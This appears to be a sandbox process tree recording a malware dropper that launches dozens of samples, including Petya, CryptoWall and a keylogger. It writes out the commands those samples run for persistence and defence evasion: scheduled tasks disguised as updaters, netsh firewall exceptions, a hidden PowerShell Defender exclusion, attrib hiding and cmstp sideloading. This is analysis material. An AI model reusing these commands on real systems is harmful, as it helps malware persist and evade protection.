  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  PID:8244
- C:\Users\Admin\Desktop\Files\csl.exe
  "C:\Users\Admin\Desktop\Files\csl.exe"
  2⤵
  PID:8964
- C:\Users\Admin\Desktop\Files\SteamDetector.exe
  "C:\Users\Admin\Desktop\Files\SteamDetector.exe"
  2⤵
  PID:11528
- - C:\Users\Admin\AppData\Roaming\SteamDetector.exe
    "C:\Users\Admin\AppData\Roaming\SteamDetector.exe"
    3⤵
    PID:23460
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:24464
- C:\Users\Admin\Desktop\Files\center.exe
  "C:\Users\Admin\Desktop\Files\center.exe"
  2⤵
  PID:19620
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\CenterRun.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\CenterRun.exe
    3⤵
    PID:3640
- C:\Users\Admin\Desktop\Files\alex1212.exe
  "C:\Users\Admin\Desktop\Files\alex1212.exe"
  2⤵
  PID:21728

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:1204
- C:\Users\Admin\Desktop\Files\dwinxp64.exe
  "C:\Users\Admin\Desktop\Files\dwinxp64.exe"
  2⤵
  PID:14184
- C:\Users\Admin\Desktop\Files\Sync.exe
  "C:\Users\Admin\Desktop\Files\Sync.exe"
  2⤵
  PID:14948
- C:\Users\Admin\Desktop\Files\22.exe
  "C:\Users\Admin\Desktop\Files\22.exe"
  2⤵
  PID:16396
- C:\Users\Admin\Desktop\Files\Minecraft.exe
  "C:\Users\Admin\Desktop\Files\Minecraft.exe"
  2⤵
  PID:17428

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:1548
- C:\Users\Admin\Desktop\Files\VC_redist.exe
  "C:\Users\Admin\Desktop\Files\VC_redist.exe"
  2⤵
  PID:13804

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5664
- C:\Users\Admin\Desktop\Files\spectrum.exe
  "C:\Users\Admin\Desktop\Files\spectrum.exe"
  2⤵
  PID:14820
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\spectrum.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:14848
- C:\Users\Admin\Desktop\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe
  "C:\Users\Admin\Desktop\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe"
  2⤵
  PID:16540
- C:\Users\Admin\Desktop\Files\aa.exe
  "C:\Users\Admin\Desktop\Files\aa.exe"
  2⤵
  PID:14900

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5228
- C:\Users\Admin\Desktop\Files\1223.exe
  "C:\Users\Admin\Desktop\Files\1223.exe"
  2⤵
  PID:8784
- C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe
  "C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
  2⤵
  PID:4972
- - C:\Users\Admin\AppData\Local\Temp\is-9AUP4.tmp\SrbijaSetupHokej.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-9AUP4.tmp\SrbijaSetupHokej.tmp" /SL5="$1090E,3939740,937984,C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
    3⤵
    PID:12372
- C:\Users\Admin\Desktop\Files\01.exe
  "C:\Users\Admin\Desktop\Files\01.exe"
  2⤵
  PID:12936
- - C:\Windows\system32\taskkill.exe
    "taskkill" /f /im pcidrv.exe
    3⤵
    - Kills process with taskkill
    PID:9160
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\busdrv.exe /sc minute /mo 1 /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:13516
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Users\Admin\Drivers\busdrv.exe /sc onstart /ru SYSTEM /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:14092
- C:\Users\Admin\Desktop\Files\ScreenConnect.ClientSetup.2.exe
  "C:\Users\Admin\Desktop\Files\ScreenConnect.ClientSetup.2.exe"
  2⤵
  PID:8540
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\01fac69d2094db79\ScreenConnect.ClientSetup.msi"
    3⤵
    PID:20288
- C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe
  "C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe"
  2⤵
  PID:14964
- C:\Users\Admin\Desktop\Files\Petya.A.exe
  "C:\Users\Admin\Desktop\Files\Petya.A.exe"
  2⤵
  PID:17016
- C:\Users\Admin\Desktop\Files\CPDB.exe
  "C:\Users\Admin\Desktop\Files\CPDB.exe"
  2⤵
  PID:21424

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5068
- C:\Users\Admin\Desktop\Files\k360.exe
  "C:\Users\Admin\Desktop\Files\k360.exe"
  2⤵
  PID:10008
- C:\Users\Admin\Desktop\Files\InfinityCrypt.exe
  "C:\Users\Admin\Desktop\Files\InfinityCrypt.exe"
  2⤵
  PID:9328
- C:\Users\Admin\Desktop\Files\Dark_Autre_ncrypt.exe
  "C:\Users\Admin\Desktop\Files\Dark_Autre_ncrypt.exe"
  2⤵
  PID:14936
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\Desktop\Files\Dark_Autre_ncrypt.exe" +s +h
    3⤵
    PID:8476
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\Desktop\Files" +s +h
    3⤵
    PID:18332
- C:\Users\Admin\Desktop\Files\Krishna33.exe
  "C:\Users\Admin\Desktop\Files\Krishna33.exe"
  2⤵
  PID:22152

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5880
- C:\Users\Admin\Desktop\Files\ENP.exe
  "C:\Users\Admin\Desktop\Files\ENP.exe"
  2⤵
  PID:2144
- C:\Users\Admin\Desktop\Files\ChromeUpdate.exe
  "C:\Users\Admin\Desktop\Files\ChromeUpdate.exe"
  2⤵
  PID:9892
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "ChromeUpdate" /tr "C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:13128
- C:\Users\Admin\Desktop\Files\cHSzTDjVl.exe
  "C:\Users\Admin\Desktop\Files\cHSzTDjVl.exe"
  2⤵
  PID:10372
- C:\Users\Admin\Desktop\Files\CondoGenerator.exe
  "C:\Users\Admin\Desktop\Files\CondoGenerator.exe"
  2⤵
  PID:11236
- C:\Users\Admin\Desktop\Files\jrockekcurje.exe
  "C:\Users\Admin\Desktop\Files\jrockekcurje.exe"
  2⤵
  PID:16548

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:2344
- C:\Users\Admin\Desktop\Files\12321321.exe
  "C:\Users\Admin\Desktop\Files\12321321.exe"
  2⤵
  PID:9152
- C:\Users\Admin\Desktop\Files\Discord.exe
  "C:\Users\Admin\Desktop\Files\Discord.exe"
  2⤵
  PID:12164
- - C:\Users\Admin\Desktop\Files\Discord.exe
    "C:\Users\Admin\Desktop\Files\Discord.exe"
    3⤵
    PID:14168
- C:\Users\Admin\Desktop\Files\systempreter.exe
  "C:\Users\Admin\Desktop\Files\systempreter.exe"
  2⤵
  PID:12264
- C:\Users\Admin\Desktop\Files\benpolatalemdar.exe
  "C:\Users\Admin\Desktop\Files\benpolatalemdar.exe"
  2⤵
  PID:15340
- C:\Users\Admin\Desktop\Files\Nan_Brout_ncrypt.exe
  "C:\Users\Admin\Desktop\Files\Nan_Brout_ncrypt.exe"
  2⤵
  PID:16556
- C:\Users\Admin\Desktop\Files\njntos.exe
  "C:\Users\Admin\Desktop\Files\njntos.exe"
  2⤵
  PID:18516
- C:\Users\Admin\Desktop\Files\LAc2heq.exe
  "C:\Users\Admin\Desktop\Files\LAc2heq.exe"
  2⤵
  PID:956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:21596

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:4844
- C:\Users\Admin\Desktop\Files\svhost.exe
  "C:\Users\Admin\Desktop\Files\svhost.exe"
  2⤵
  PID:15208
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\svhost.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:19128
- C:\Users\Admin\Desktop\Files\3e3ev3.exe
  "C:\Users\Admin\Desktop\Files\3e3ev3.exe"
  2⤵
  PID:16404
- C:\Users\Admin\Desktop\Files\chromedriver.exe
  "C:\Users\Admin\Desktop\Files\chromedriver.exe"
  2⤵
  PID:18124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5060
- C:\Users\Admin\Desktop\Files\IATInfect2008_64.exe
  "C:\Users\Admin\Desktop\Files\IATInfect2008_64.exe"
  2⤵
  PID:12904

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6888
- C:\Users\Admin\Desktop\Files\installer.exe.exe
  "C:\Users\Admin\Desktop\Files\installer.exe.exe"
  2⤵
  PID:10688
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  "C:\Users\Admin\Desktop\Files\fusca%20game.exe"
  2⤵
  PID:11284
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\fusca%20game.exe" "fusca%20game.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:13604
- C:\Users\Admin\Desktop\Files\333.exe
  "C:\Users\Admin\Desktop\Files\333.exe"
  2⤵
  PID:12740
- C:\Users\Admin\Desktop\Files\cfxre.exe
  "C:\Users\Admin\Desktop\Files\cfxre.exe"
  2⤵
  PID:396
- C:\Users\Admin\Desktop\Files\alex12112.exe
  "C:\Users\Admin\Desktop\Files\alex12112.exe"
  2⤵
  PID:13416
- - C:\Users\Admin\Desktop\Files\alex12112.exe
    "C:\Users\Admin\Desktop\Files\alex12112.exe"
    3⤵
    PID:11496
- - C:\Users\Admin\Desktop\Files\alex12112.exe
    "C:\Users\Admin\Desktop\Files\alex12112.exe"
    3⤵
    PID:15876
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 13416 -s 992
    3⤵
    - Program crash
    PID:16272
- C:\Users\Admin\Desktop\Files\savedecrypter.exe
  "C:\Users\Admin\Desktop\Files\savedecrypter.exe"
  2⤵
  PID:15352
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "TCP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmp1488.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:14900
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "TCP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp6827.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:6492
- C:\Users\Admin\Desktop\Files\prueba.exe
  "C:\Users\Admin\Desktop\Files\prueba.exe"
  2⤵
  PID:8976

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6040
- C:\Users\Admin\Desktop\Files\foggy-mountains.exe
  "C:\Users\Admin\Desktop\Files\foggy-mountains.exe"
  2⤵
  PID:11044
- C:\Users\Admin\Desktop\Files\444.exe
  "C:\Users\Admin\Desktop\Files\444.exe"
  2⤵
  PID:14880
- - C:\Users\Admin\AppData\Roaming\conhost.exe
    "C:\Users\Admin\AppData\Roaming\conhost.exe"
    3⤵
    PID:3688

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5772
- C:\Users\Admin\Desktop\Files\TG_Sub.exe
  "C:\Users\Admin\Desktop\Files\TG_Sub.exe"
  2⤵
  PID:10364
- C:\Users\Admin\Desktop\Files\mos%20ssssttttt.exe
  "C:\Users\Admin\Desktop\Files\mos%20ssssttttt.exe"
  2⤵
  PID:12032
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:21812
- C:\Users\Admin\Desktop\Files\RDPW_Installer.exe
  "C:\Users\Admin\Desktop\Files\RDPW_Installer.exe"
  2⤵
  PID:14108
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\16BA.tmp\16BB.tmp\16BC.bat C:\Users\Admin\Desktop\Files\RDPW_Installer.exe"
    3⤵
    PID:10076
  - - C:\Users\Admin\AppData\Local\Temp\16BA.tmp\RDPWInst.exe
      "RDPWInst" -u
      4⤵
      PID:20728
  - - C:\Windows\system32\PING.EXE
      ping -n 3 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:23268
- C:\Users\Admin\Desktop\Files\LicenseMalwareBytes.exe
  "C:\Users\Admin\Desktop\Files\LicenseMalwareBytes.exe"
  2⤵
  PID:16568
- - C:\Users\Admin\Desktop\Files\LicenseMalwareBytes.exe
    "C:\Users\Admin\Desktop\Files\LicenseMalwareBytes.exe"
    3⤵
    PID:19052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c gpupdate /force
      4⤵
      PID:20268
- C:\Users\Admin\Desktop\Files\Service.exe
  "C:\Users\Admin\Desktop\Files\Service.exe"
  2⤵
  PID:5472
- C:\Users\Admin\Desktop\Files\ee.exe
  "C:\Users\Admin\Desktop\Files\ee.exe"
  2⤵
  PID:19612

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6680
- C:\Users\Admin\Desktop\Files\IMG001.exe
  "C:\Users\Admin\Desktop\Files\IMG001.exe"
  2⤵
  PID:12028
- C:\Users\Admin\Desktop\Files\wmnp.exe
  "C:\Users\Admin\Desktop\Files\wmnp.exe"
  2⤵
  PID:24388

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:1856
- C:\Users\Admin\Desktop\Files\ConsoleApplication4.exe
  "C:\Users\Admin\Desktop\Files\ConsoleApplication4.exe"
  2⤵
  PID:9912
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:12376
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:13388
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:15712
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:18256
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:20116
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:16036
- C:\Users\Admin\Desktop\Files\CritScript.exe
  "C:\Users\Admin\Desktop\Files\CritScript.exe"
  2⤵
  PID:10176
- - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
    "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
    3⤵
    PID:14984
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:14408

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:952
- C:\Users\Admin\Desktop\Files\update.exe
  "C:\Users\Admin\Desktop\Files\update.exe"
  2⤵
  PID:10312
- - C:\Users\Admin\AppData\Local\Temp\temp_WinScriptHost_10312_133897304456306970\git_update.exe
    C:\Users\Admin\Desktop\Files\update.exe
    3⤵
    PID:14416
- C:\Users\Admin\Desktop\Files\standalone_payload.exe
  "C:\Users\Admin\Desktop\Files\standalone_payload.exe"
  2⤵
  PID:7668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c rundll32.exe lib32.dll payload
    3⤵
    PID:17072
  - - C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe lib32.dll payload
      4⤵
      PID:5276
- C:\Users\Admin\Desktop\Files\hack.exe
  "C:\Users\Admin\Desktop\Files\hack.exe"
  2⤵
  PID:16428

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:4576
- C:\Users\Admin\Desktop\Files\v1saferui.2.exe
  "C:\Users\Admin\Desktop\Files\v1saferui.2.exe"
  2⤵
  PID:11172
- - C:\Users\Admin\Desktop\Files\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:9100
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:15896
- C:\Users\Admin\Desktop\Files\Sentil.exe
  "C:\Users\Admin\Desktop\Files\Sentil.exe"
  2⤵
  PID:11392
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:17568
- - C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"
    3⤵
    PID:20972
- C:\Users\Admin\Desktop\Files\XMZTSVYE_l10_wix4_dash.exe
  "C:\Users\Admin\Desktop\Files\XMZTSVYE_l10_wix4_dash.exe"
  2⤵
  PID:16412
- - C:\Windows\TEMP\{F95DDC20-163E-44A9-A16E-5AC4BF6C46BA}\.cr\XMZTSVYE_l10_wix4_dash.exe
    "C:\Windows\TEMP\{F95DDC20-163E-44A9-A16E-5AC4BF6C46BA}\.cr\XMZTSVYE_l10_wix4_dash.exe" -burn.clean.room="C:\Users\Admin\Desktop\Files\XMZTSVYE_l10_wix4_dash.exe" -burn.filehandle.attached=700 -burn.filehandle.self=708
    3⤵
    PID:17836
  - - C:\Windows\TEMP\{74DA0F6C-D772-444C-A454-71D0AAFC83E6}\.ba\Dashboard.exe
      C:\Windows\TEMP\{74DA0F6C-D772-444C-A454-71D0AAFC83E6}\.ba\Dashboard.exe
      4⤵
      PID:10844
    - - C:\Users\Admin\AppData\Roaming\dqfPatch_beta\Dashboard.exe
        
        C:\Users\Admin\AppData\Roaming\dqfPatch_beta\Dashboard.exe
        5⤵
        
        PID:19832
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        
        PID:18696
- C:\Users\Admin\Desktop\Files\G1.exe
  "C:\Users\Admin\Desktop\Files\G1.exe"
  2⤵
  PID:18132
- C:\Users\Admin\Desktop\Files\bilvarw.exe
  "C:\Users\Admin\Desktop\Files\bilvarw.exe"
  2⤵
  PID:18272
- C:\Users\Admin\Desktop\Files\ULauncher.exe
  "C:\Users\Admin\Desktop\Files\ULauncher.exe"
  2⤵
  PID:4468

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5776
- C:\Users\Admin\Desktop\Files\boleto.exe
  "C:\Users\Admin\Desktop\Files\boleto.exe"
  2⤵
  PID:10656
- C:\Users\Admin\Desktop\Files\Syncing.exe
  "C:\Users\Admin\Desktop\Files\Syncing.exe"
  2⤵
  PID:10648
- C:\Users\Admin\Desktop\Files\default.2.exe
  "C:\Users\Admin\Desktop\Files\default.2.exe"
  2⤵
  PID:11792
- C:\Users\Admin\Desktop\Files\VB.NET%20CRYPTER%20V2.exe
  "C:\Users\Admin\Desktop\Files\VB.NET%20CRYPTER%20V2.exe"
  2⤵
  PID:8040
- C:\Users\Admin\Desktop\Files\Software.exe
  "C:\Users\Admin\Desktop\Files\Software.exe"
  2⤵
  PID:19784
- - C:\Users\Admin\Desktop\Files\Software.exe
    "C:\Users\Admin\Desktop\Files\Software.exe"
    3⤵
    PID:14860
- C:\Users\Admin\Desktop\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe
  "C:\Users\Admin\Desktop\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe"
  2⤵
  PID:22144

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6768
- C:\Users\Admin\Desktop\Files\hack1226.exe
  "C:\Users\Admin\Desktop\Files\hack1226.exe"
  2⤵
  PID:10764
- C:\Users\Admin\Desktop\Files\assignment.exe
  "C:\Users\Admin\Desktop\Files\assignment.exe"
  2⤵
  PID:1236
- - C:\Users\Admin\AppData\Roaming\keylogger_hook.exe
    "C:\Users\Admin\AppData\Roaming\keylogger_hook.exe"
    3⤵
    PID:14808

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:5044
- C:\Users\Admin\Desktop\Files\cssgo.exe
  "C:\Users\Admin\Desktop\Files\cssgo.exe"
  2⤵
  PID:10520
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10520 -s 1732
    3⤵
    - Program crash
    PID:9944
- C:\Users\Admin\Desktop\Files\CryptoWall.exe
  "C:\Users\Admin\Desktop\Files\CryptoWall.exe"
  2⤵
  PID:9160
- - C:\Windows\SysWOW64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    3⤵
    PID:11324
  - - C:\Windows\SysWOW64\svchost.exe
      -k netsvcs
      4⤵
      PID:11784
- C:\Users\Admin\Desktop\Files\thin.exe
  "C:\Users\Admin\Desktop\Files\thin.exe"
  2⤵
  PID:12544
- C:\Users\Admin\Desktop\Files\winbox.exe
  "C:\Users\Admin\Desktop\Files\winbox.exe"
  2⤵
  PID:16260
- C:\Users\Admin\Desktop\Files\three-daisies.exe
  "C:\Users\Admin\Desktop\Files\three-daisies.exe"
  2⤵
  PID:5900
- C:\Users\Admin\Desktop\Files\Creal.exe
  "C:\Users\Admin\Desktop\Files\Creal.exe"
  2⤵
  PID:19464
- C:\Users\Admin\Desktop\Files\Mova.exe
  "C:\Users\Admin\Desktop\Files\Mova.exe"
  2⤵
  PID:23216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5128 -ip 5128
1⤵
PID:7096

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:2916
- C:\Users\Admin\Desktop\Files\856.exe
  "C:\Users\Admin\Desktop\Files\856.exe"
  2⤵
  PID:6852
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:12228
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"
    3⤵
    - Modifies Windows Firewall
    PID:20576
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:20724
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 1444
    3⤵
    PID:19256
- C:\Users\Admin\Desktop\Files\stub.exe
  "C:\Users\Admin\Desktop\Files\stub.exe"
  2⤵
  PID:12300
- C:\Users\Admin\Desktop\Files\kdmapper.exe
  "C:\Users\Admin\Desktop\Files\kdmapper.exe"
  2⤵
  PID:14760
- C:\Users\Admin\Desktop\Files\Client-built10.exe
  "C:\Users\Admin\Desktop\Files\Client-built10.exe"
  2⤵
  PID:14528
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "kazeku" /sc ONLOGON /tr "C:\Program Files\kazeku\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:19588
- C:\Users\Admin\Desktop\Files\cam.exe
  "C:\Users\Admin\Desktop\Files\cam.exe"
  2⤵
  PID:18508
- - C:\Windows\system32\tasklist.exe
    "tasklist"
    3⤵
    - Enumerates processes with tasklist
    PID:6556
- C:\Users\Admin\Desktop\Files\justpoc.exe
  "C:\Users\Admin\Desktop\Files\justpoc.exe"
  2⤵
  PID:20120

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6276
- C:\Users\Admin\Desktop\Files\Final.exe
  "C:\Users\Admin\Desktop\Files\Final.exe"
  2⤵
  PID:10984
